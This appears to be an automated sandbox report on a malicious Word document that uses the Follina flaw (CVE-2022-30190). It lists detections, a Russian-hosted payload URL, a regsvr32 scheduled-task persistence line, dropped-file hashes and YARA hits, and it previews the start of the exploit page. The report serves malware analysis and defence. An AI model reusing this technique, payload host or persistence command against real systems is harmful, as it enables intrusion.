27.2.regsvr32.exe.4990000.3.unpack | 100% | Avira | HEUR/AGEN.1234562 |
38.2.regsvr32.exe.2d80000.0.unpack | 100% | Avira | HEUR/AGEN.1232827 |
33.2.explorer.exe.2e60000.0.unpack | 100% | Avira | HEUR/AGEN.1234562 |
29.2.regsvr32.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1232827 |
                            No Antivirus matches
Source | Detection | Scanner | Label | Link
https://roaming.edog. | 0% | URL Reputation | safe |
https://cdn.entity. | 0% | URL Reputation | safe |
https://powerlift.acompli.net | 0% | URL Reputation | safe |
https://rpsticket.partnerservices.getmicrosoftkey.com | 0% | URL Reputation | safe |
https://cortana.ai | 0% | URL Reputation | safe |
https://api.aadrm.com/ | 0% | URL Reputation | safe |
https://ofcrecsvcapi-int.azurewebsites.net/ | 0% | URL Reputation | safe |
https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h | 0% | Avira URL Cloud | safe |
https://res.getmicrosoftkey.com/api/redemptionevents | 0% | URL Reputation | safe |
https://powerlift-frontdesk.acompli.net | 0% | URL Reputation | safe |
https://officeci.azurewebsites.net/api/ | 0% | URL Reputation | safe |
http://www.borland.com/namespaces/Types-IWSDLPublish | 0% | Avira URL Cloud | safe |
https://store.office.cn/addinstemplate | 0% | URL Reputation | safe |
https://api.aadrm.com | 0% | URL Reputation | safe |
http://185.234.247.119/123.RES | 2% | Virustotal | | Browse
http://185.234.247.119/123.RES | 0% | Avira URL Cloud | safe |
https://dev0-api.acompli.net/autodetect | 0% | URL Reputation | safe |
https://www.odwebp.svc.ms | 0% | URL Reputation | safe |
https://api.addins.store.officeppe.com/addinstemplate | 0% | URL Reputation | safe |
http://185.234.247.119:80/123.RES | 2% | Virustotal | | Browse
http://185.234.247.119:80/123.RES | 0% | Avira URL Cloud | safe |
https://dataservice.o365filtering.com/ | 0% | URL Reputation | safe |
https://officesetup.getmicrosoftkey.com | 0% | URL Reputation | safe |
http://www.borland.com/namespaces/Typeshhttp://www.borland.com/namespaces/Types-IWSDLPublish | 0% | URL Reputation | safe |
https://prod-global-autodetect.acompli.net/autodetect | 0% | URL Reputation | safe |
http://crl.micro | 0% | URL Reputation | safe |
https://ncus.contentsync. | 0% | URL Reputation | safe |
https://apis.live.net/v5.0/ | 0% | URL Reputation | safe |
https://wus2.contentsync. | 0% | URL Reputation | safe |
http://www.borland.com/namespaces/TypesU | 0% | URL Reputation | safe |
https://asgsmsproxyapi.azurewebsites.net/ | 0% | URL Reputation | safe |
http://www.borland.com/namespaces/Types | 0% | URL Reputation | safe |
http://www.borland.com/namespaces/Typesp | 0% | Avira URL Cloud | safe |
                            No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://185.234.247.119/123.RES | true | 2%, Virustotal, Browse; Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://api.diagnosticssdf.office.com | DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr | false | | high
https://login.microsoftonline.com/ | DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr | false | | high
https://shell.suite.office.com:1443 | DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr | false | | high
https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize | DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr | false | | high
http://schemas.xmlsoap.org/soap/encoding/Nhttp://www.borland.com/namespaces/Types | explorer.exe, 00000021.00000003.677304692.00000000050E4000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000026.00000002.711839050.0000000002D81000.00000020.00000001.01000000.0000000E.sdmp | false | | high
https://autodiscover-s.outlook.com/ | DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr | false | | high
https://roaming.edog. | DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr | false | URL Reputation: safe | unknown
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr | DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr | false | | high
https://cdn.entity. | DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr | false | URL Reputation: safe | unknown
https://api.addins.omex.office.net/appinfo/query | DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr | false | | high
https://clients.config.office.net/user/v1.0/tenantassociationkey | DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr | false | | high
https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/ | DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr | false | | high
https://powerlift.acompli.net | DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr | false | URL Reputation: safe | unknown
https://rpsticket.partnerservices.getmicrosoftkey.com | DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr | false | URL Reputation: safe | unknown
https://lookup.onenote.com/lookup/geolocation/v1 | DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr | false | | high
https://cortana.ai | DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr | false | URL Reputation: safe | unknown
https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech | DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr | false | | high
https://cloudfiles.onenote.com/upload.aspx | DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr | false | | high
https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile | DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr | false | | high
https://entitlement.diagnosticssdf.office.com | DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr | false | | high
https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy | DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr | false | | high
https://api.aadrm.com/ | DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr | false | URL Reputation: safe | unknown
https://ofcrecsvcapi-int.azurewebsites.net/ | DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/soap/http | regsvr32.exe, 00000026.00000002.711839050.0000000002D81000.00000020.00000001.01000000.0000000E.sdmp | false | | high
https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies | DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr | false | | high
https://api.microsoftstream.com/api/ | DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr | false | | high
https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive | DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr | false | | high
https://cr.office.com | DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr | false | | high
https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;h | DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr | false | Avira URL Cloud: safe | low
https://portal.office.com/account/?ref=ClientMeControl | DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr | false | | high
https://graph.ppe.windows.net | DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr | false | | high
https://res.getmicrosoftkey.com/api/redemptionevents | DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr | false | URL Reputation: safe | unknown
https://powerlift-frontdesk.acompli.net | DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr | false | URL Reputation: safe | unknown
https://tasks.office.com | DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr | false | | high
https://officeci.azurewebsites.net/api/ | DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr | false | URL Reputation: safe | unknown
https://sr.outlook.office.net/ws/speech/recognize/assistant/work | DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr | false | | high
http://www.borland.com/namespaces/Types-IWSDLPublish | regsvr32.exe, 00000026.00000002.713602734.0000000002F30000.00000004.00001000.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://store.office.cn/addinstemplate | DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/soap/encoding/ | regsvr32.exe, 00000026.00000002.711839050.0000000002D81000.00000020.00000001.01000000.0000000E.sdmp | false | | high
https://api.aadrm.com | DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr | false | URL Reputation: safe | unknown
https://outlook.office.com/autosuggest/api/v1/init?cvid= | DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr | false | | high
https://globaldisco.crm.dynamics.com | DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr | false | | high
https://messaging.engagement.office.com/ | DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr | false | | high
https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech | DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr | false | | high
https://dev0-api.acompli.net/autodetect | DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr | false | URL Reputation: safe | unknown
https://www.odwebp.svc.ms | DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr | false | URL Reputation: safe | unknown
https://api.diagnosticssdf.office.com/v2/feedback | DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr | false | | high
https://api.powerbi.com/v1.0/myorg/groups | DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr | false | | high
https://web.microsoftstream.com/video/ | DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr | false | | high
https://api.addins.store.officeppe.com/addinstemplate | DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr | false | URL Reputation: safe | unknown
http://185.234.247.119:80/123.RES | ~WRS{677538CC-22A1-43D9-BD9A-C629280F1C4E}.tmp.0.dr | false | 2%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://graph.windows.net | DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr | false | | high
https://dataservice.o365filtering.com/ | DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr | false | URL Reputation: safe | unknown
https://officesetup.getmicrosoftkey.com | DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr | false | URL Reputation: safe | unknown
http://www.borland.com/namespaces/Typeshhttp://www.borland.com/namespaces/Types-IWSDLPublish | explorer.exe, 00000021.00000003.677304692.00000000050E4000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000026.00000002.711839050.0000000002D81000.00000020.00000001.01000000.0000000E.sdmp | false | URL Reputation: safe | unknown
https://analysis.windows.net/powerbi/api | DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr | false | | high
https://prod-global-autodetect.acompli.net/autodetect | DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr | false | URL Reputation: safe | unknown
https://outlook.office365.com/autodiscover/autodiscover.json | DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr | false | | high
https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios | DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr | false | | high
https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech | DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr | false | | high
http://crl.micro | msdt.exe, 00000007.00000002.713967957.0000000005990000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json | DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr | false | | high
http://schemas.xmlsoap.org/wsdl/ | regsvr32.exe, 00000026.00000002.711839050.0000000002D81000.00000020.00000001.01000000.0000000E.sdmp | false | | high
https://ncus.contentsync. | DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr | false | URL Reputation: safe | unknown
https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false | DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr | false | | high
https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/ | DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr | false | | high
http://weather.service.msn.com/data.aspx | DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr | false | | high
https://apis.live.net/v5.0/ | DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr | false | URL Reputation: safe | unknown
https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks | DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr | false | | high
http://schemas.xmlsoap.org/wsdl/mime/ | regsvr32.exe, 00000026.00000002.711839050.0000000002D81000.00000020.00000001.01000000.0000000E.sdmp | false | | high
https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios | DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr | false | | high
https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml | DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr | false | | high
https://management.azure.com | DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr | false | | high
https://outlook.office365.com | DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr | false | | high
https://wus2.contentsync. | DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr | false | URL Reputation: safe | unknown
https://incidents.diagnostics.office.com | DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr | false | | high
https://clients.config.office.net/user/v1.0/ios | DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr | false | | high
http://www.borland.com/namespaces/TypesU | explorer.exe, 00000021.00000003.677304692.00000000050E4000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000026.00000002.711839050.0000000002D81000.00000020.00000001.01000000.0000000E.sdmp | false | URL Reputation: safe | unknown
https://insertmedia.bing.office.net/odc/insertmedia | DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr | false | | high
https://o365auditrealtimeingestion.manage.office.com | DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr | false | | high
https://outlook.office365.com/api/v1.0/me/Activities | DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr | false | | high
http://schemas.xmlsoap.org/soap/envelope/ | explorer.exe, 00000021.00000003.677304692.00000000050E4000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 00000026.00000002.711839050.0000000002D81000.00000020.00000001.01000000.0000000E.sdmp | false | | high
https://api.office.net | DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr | false | | high
https://incidents.diagnosticssdf.office.com | DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr | false | | high
https://asgsmsproxyapi.azurewebsites.net/ | DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr | false | URL Reputation: safe | unknown
https://clients.config.office.net/user/v1.0/android/policies | DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr | false | | high
https://entitlement.diagnostics.office.com | DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr | false | | high
https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json | DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr | false | | high
https://substrate.office.com/search/api/v2/init | DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.dr | false | | high
                                                                                                                                                      https://outlook.office.com/DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                                                                                        high
                                                                                                                                                        http://schemas.xmlsoap.org/wsdl/soap/regsvr32.exe, 00000026.00000002.711839050.0000000002D81000.00000020.00000001.01000000.0000000E.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://storage.live.com/clientlogs/uploadlocationDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                                                                                            high
                                                                                                                                                            https://outlook.office365.com/DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                                                                                              high
                                                                                                                                                              https://webshell.suite.office.comDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                                                                                                high
                                                                                                                                                                https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDriveDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://substrate.office.com/search/api/v1/SearchHistoryDD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                                                                                                    high
                                                                                                                                                                    http://www.borland.com/namespaces/Typesregsvr32.exe, 0000001C.00000002.672872094.0000000000867000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                    unknown
                                                                                                                                                                    http://www.borland.com/namespaces/Typespregsvr32.exe, 0000001B.00000002.672627187.0000000002BD7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                    unknown
                                                                                                                                                                    https://management.azure.com/DD77C7D6-2AC5-4FD4-86E9-418877D1BD59.0.drfalse
                                                                                                                                                                      high
                                                                                                                                                                      • No. of IPs < 25%
                                                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                                                      • 75% < No. of IPs
IP               Domain   Country             ASN     ASN Name          Malicious
185.234.247.119  unknown  Russian Federation  198004  INTERKONEKT-ASPL  true

IP
192.168.2.1
Joe Sandbox Version: 35.0.0 Citrine
Analysis ID: 640940
Start date and time: 2022-06-07 19:48:55 +02:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 12m 54s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: doc782.docx
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name: Potential for more IOCs and behavior
Number of new started processes analysed: 41
Number of new started drivers analysed: 1
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.expl.evad.winDOCX@31/32@0/2
EGA Information:
• Successful, ratio: 100%
HDC Information:
• Successful, ratio: 15.4% (good quality ratio 14.6%)
• Quality average: 77.3%
• Quality standard deviation: 26.3%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Found application associated with file extension: .docx
• Adjust boot time
• Enable AMSI
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
• Exclude process from analysis (whitelisted): MpCmdRun.exe, sdiagnhost.exe, mrxdav.sys, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
• TCP Packets have been reduced to 100
• Excluded IPs from analysis (whitelisted): 52.109.32.63, 52.109.88.38, 52.109.76.34, 52.109.12.23, 52.109.12.21, 52.109.12.22, 20.223.24.244
• Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, prod-w.nexus.live.com.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, prod.configsvc1.live.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ctldl.windowsupdate.com, arc.msn.com, licensing.mp.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, login.live.com, config.officeapps.live.com, sls.update.microsoft.com, nexus.officeapps.live.com, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, europe.configsvc1.live.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
Time      Type            Description
19:52:07  Task Scheduler  Run new task: swyghewz path: regsvr32.exe s>-s "C:\Users\user\AppData\Local\Temp\t1.A"
Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type: Microsoft Access Database
Category: dropped
Size (bytes): 528384
Entropy (8bit): 0.475473229136101
Encrypted: false
SSDEEP: 384:hGfXQVJCC88SFyfZ0jGBtRe7JJWzwtZ1Ia+hVZO4Fg:kfX+ClHeZPaSz/5I
MD5: 766811A42870AEE1D9D9EDC5CF39B751
SHA1: 4CCD5DD755B159D32716FBBEECA2B33FC67B1466
SHA-256: 88640A8D62914E568A7ADA112DCC06DED81028F1375883BC60575D8BEC2F20D7
SHA-512: B3CF99A75F5480D9FC6E60D2EBF0EABFC5C775CE7C7BDB7227D7A7149A63431BC2A602352A36B687D877410ECD661E044A22445ED2C96840A7AD439E90245E89
Malicious: false
                                                                                                                                                                      Preview:....Standard ACE DB......n.b`..U.gr@?..~.....1.y..0...c...F...N)U.7...i.(...`.:{6Z...Z.C`..3..y[=.|*..|......6...f_...$.g..'D...e....F.x....-b.T...4.0.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 36
Entropy (8bit): 2.730660070105504
Encrypted: false
SSDEEP: 3:5NixJlElGUR:WrEcUR
MD5: 1F830B53CA33A1207A86CE43177016FA
SHA1: BDF230E1F33AFBA5C9D5A039986C6505E8B09665
SHA-256: EAF9CDC741596275E106DDDCF8ABA61240368A8C7B0B58B08F74450D162337EF
SHA-512: 502248E893FCFB179A50863D7AC1866B5A466C9D5781499EBC1D02DF4F6D3E07B9E99E0812E747D76734274BD605DAD6535178D6CE06F08F1A02AB60335DE066
Malicious: false
Preview: C.e.n.t.r.a.l.T.a.b.l.e...a.c.c.d.b.

Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type: data
Category: dropped
Size (bytes): 64
Entropy (8bit): 1.4172860556164644
Encrypted: false
SSDEEP: 3:GUfFF/FaV:DtFdu
MD5: C2AC3C4E2F040FECC0C759333329FC5F
SHA1: D60D4854A23808FD2D67A20DDD9001D5567B1F53
SHA-256: F42C7EE07D25E6BCABCFDA1B8EA31928008FDA1A2C51E8D5C08410E6802EF2F3
SHA-512: 5EFBE74E618899E05B228FB255CBF20468ED9303723F508202CED231FB0CAD966A92D7F092FC286CA5211EB8F56A0C6EA5CD742D94003064E7C42D92137C9DF8
Malicious: false
Preview: 855271. Admin.

Process: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type: XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category: dropped
Size (bytes): 147863
Entropy (8bit): 5.3589579589937095
Encrypted: false
SSDEEP: 1536:PcQW/gxgB5BQguw//Q9DQW+zQWk4F77nXmvidQXxUETLKz6e:OHQ9DQW+zIXLI
MD5: 87FB26E1D0012B07EAFADBCA4DB26C9C
SHA1: A1BCD06085146F821F90C29449DDBD0F7AF9161D
SHA-256: 9086C5DAAE4C97AEA27959F6B9B69482E9C61E1D9BCF29B8AEB8DEBEA50C60EA
SHA-512: F5F02C2C0180D115EF3A3B1BFD025BE299609A1029527349079BAA492B0521BA5E8255B7F38AC0F9FFC323352B549AAB220B3222D066D89A7702CCA29F6C2C2B
Malicious: false
                                                                                                                                                                      Preview:<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2022-06-07T17:50:06">.. Build: 16.0.15330.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                      File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):6241
                                                                                                                                                                      Entropy (8bit):4.836014560592255
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:tJ5mDtWIDu0GTl9EHbTcKeZEwC8EaKiSe+1hPw6utjdkGPgz47:wDwIwERY5V7VaGPgz47
                                                                                                                                                                      MD5:A32050027AEA96B3B70E1056490A98C9
                                                                                                                                                                      SHA1:EF28C67583C8C8048C0BAAEAD036680A60441213
                                                                                                                                                                      SHA-256:E3BA1C45F9DD1F432138654B5F19CF89C55E07219B88AA7628334D38BB036433
                                                                                                                                                                      SHA-512:1C2A1605B67FEB57F99DC4C7DAFFB16D1F3CC48D12CFC338C6D4FD84348DD6A872F6A0DAEDA70E96F49AD05B0F9690211F67346E3E4660CA2E79ED6F038A6C0C
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Yara Hits:
                                                                                                                                                                      • Rule: MAL_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\16E37148.htm, Author: Tobias Michalski, Christian Burkard
                                                                                                                                                                      • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\16E37148.htm, Author: Joe Security
                                                                                                                                                                      Preview:<!doctype html>..<html lang="en">..<head>..<title>..Good thing we disabled macros..</title>..</head>..<body>..<p>..Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque pellentesque egestas nulla in dignissim. Nam id mauris lorem. Nunc suscipit id magna id mollis. Pellentesque suscipit orci neque, at ornare sapien bibendum eu. Vestibulum malesuada nec sem quis finibus. Nam quis ligula et dui faucibus faucibus. In quis bibendum tortor.....Curabitur rutrum leo tortor, venenatis fermentum ex porttitor vitae. Proin eu imperdiet lorem, ac aliquet risus. Aenean eu sapien pharetra, imperdiet ipsum ut, semper diam. Nulla facilisi. Sed euismod tortor tortor, non eleifend nunc fermentum sit amet. Integer ligula ligula, congue at scelerisque sit amet, porttitor quis felis. Maecenas nec justo varius, semper turpis ut, gravida lorem. Proin arcu ligula, venenatis aliquam tristique ut, pretium quis velit.....Phasellus tristique orci enim, at accumsan velit interdum et. Aenean nec tristique
                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                      File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):6241
                                                                                                                                                                      Entropy (8bit):4.836014560592255
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:tJ5mDtWIDu0GTl9EHbTcKeZEwC8EaKiSe+1hPw6utjdkGPgz47:wDwIwERY5V7VaGPgz47
                                                                                                                                                                      MD5:A32050027AEA96B3B70E1056490A98C9
                                                                                                                                                                      SHA1:EF28C67583C8C8048C0BAAEAD036680A60441213
                                                                                                                                                                      SHA-256:E3BA1C45F9DD1F432138654B5F19CF89C55E07219B88AA7628334D38BB036433
                                                                                                                                                                      SHA-512:1C2A1605B67FEB57F99DC4C7DAFFB16D1F3CC48D12CFC338C6D4FD84348DD6A872F6A0DAEDA70E96F49AD05B0F9690211F67346E3E4660CA2E79ED6F038A6C0C
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Yara Hits:
                                                                                                                                                                      • Rule: MAL_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\89DF4BAA.htm, Author: Tobias Michalski, Christian Burkard
                                                                                                                                                                      • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\89DF4BAA.htm, Author: Joe Security
